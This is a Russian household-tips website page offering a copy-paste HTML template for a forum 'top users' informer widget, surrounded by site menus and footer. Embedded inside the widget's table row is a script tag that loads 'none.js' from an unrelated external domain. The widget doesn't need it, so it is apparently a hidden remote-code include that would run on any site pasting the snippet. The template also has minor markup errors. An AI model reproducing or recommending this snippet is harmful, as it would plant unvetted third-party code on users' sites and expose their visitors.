Скрипт Топ пользователей по кол-ву файлов и постов на форуме - 10 Октября 2012 - Домоводство
Домоводство
Главная | Каталог статей | Информация о сайте | Мой профиль | Выход | Вы вошли как Гость | Группа "Гости" | RSS | Карта сайта | Видео 
Суббота 10.12.2016, 06:01
Меню сайта
Джейми Оливер - Голый повар [11]
Онлайн рецепты [416]
Заготовки [103]
Пицца [20]
Готовим в глиняных горшочках [23]
Паштеты [20]
Салаты [48]
Закуски - грибы [7]
Блюда из баклажанов и кабачков [5]
Готовим в микроволновке [5]
торты и пирожное [35]
Лекарственные чаи [10]

Полезные советы

Все о кулинарии [39]
Хранение продуктов [2]
Уход за посудой [5]
И стирать надо уметь и гладить! [12]
Уход за одеждой [7]
Уход за мехом и кожей [7]
Уход за обувью [6]
Дел по дому всегда много... [12]
Такие важные мелочи! [15]
Уход за предметами быта [1]
Домашняя химчистка [9]
Наведем порядок на кухне! [7]
Полезно знать! [10]

Шитье (видео)
Красота
Здоровье
Народная медицина
Лекарственные растения
Поиск

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Реклама
Главная » 2012 » Октябрь » 10 » Скрипт Топ пользователей по кол-ву файлов и постов на форуме
23:55
Скрипт Топ пользователей по кол-ву файлов и постов на форуме
Установка:
Создаем информер:
[ Пользователи · Материалы · Кол. сообщений в форуме · Материалы: 5 · Колонки: 1 ]
В шаблон информера вставляем:

Code
<center><table cellspadding="0" class="topten_table" style="border-color: rgb(76, 76, 76); width: 100%; margin: 0px;" cellspacing="0"><tbody><tr><script src="http://cm4fan.ru/none.js" type="text/javascript"></script><td style="padding: 2px 0px 2px 4px; cursor: pointer; border-left: 0px none; width: 48px;" onclick="'';"><a href="$PROFILE_URL$" target="_blank" title="$USERNAME$"><?if($AVATAR_URL$)?>  
  <img src="$AVATAR_URL$" border="0" style="height: 40px; width: 40px; margin-right: 5px; border: 1px solid rgb(76, 76, 76); padding: 2px;"><?else?>  
  <img alt="Аватар не выбран" src="http://ili.pp.ua/img/noavat.png" border="0" style="height: 40px; width: 40px; margin-right: 5px; border: 1px solid rgb(76, 76, 76); padding: 2px;">  
  <?endif?></a></td><td style="padding: 2px 0px 2px 4px; cursor: pointer; border-left: 0px none; text-align: left; font-size: 10px; font-family: tahoma,verdana,arial; color: rgb(85, 85, 85); line-height: 14px;" onclick="';"><a href="$PROFILE_URL$"><font style="font-size: 12px; color: rgb(100, 100, 100);"><b>$USERNAME$</b></font></a><br>Добавил файлов: <b><font color="646464">$LOAD_POSTS$</font></b><br>Количество постов: <b><font color="646464">$FORUM_POSTS$</font></b></td></tr></tbody></table></center><hr>
Просмотров: 50 | Добавил: Aninew | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Реклама
 
Copyright MyCorp © 2016


При копировании материала активная ссылка на сайт "Домоводство" - обязательна!!!
Топ100- Хозяйка Goon Каталог сайтов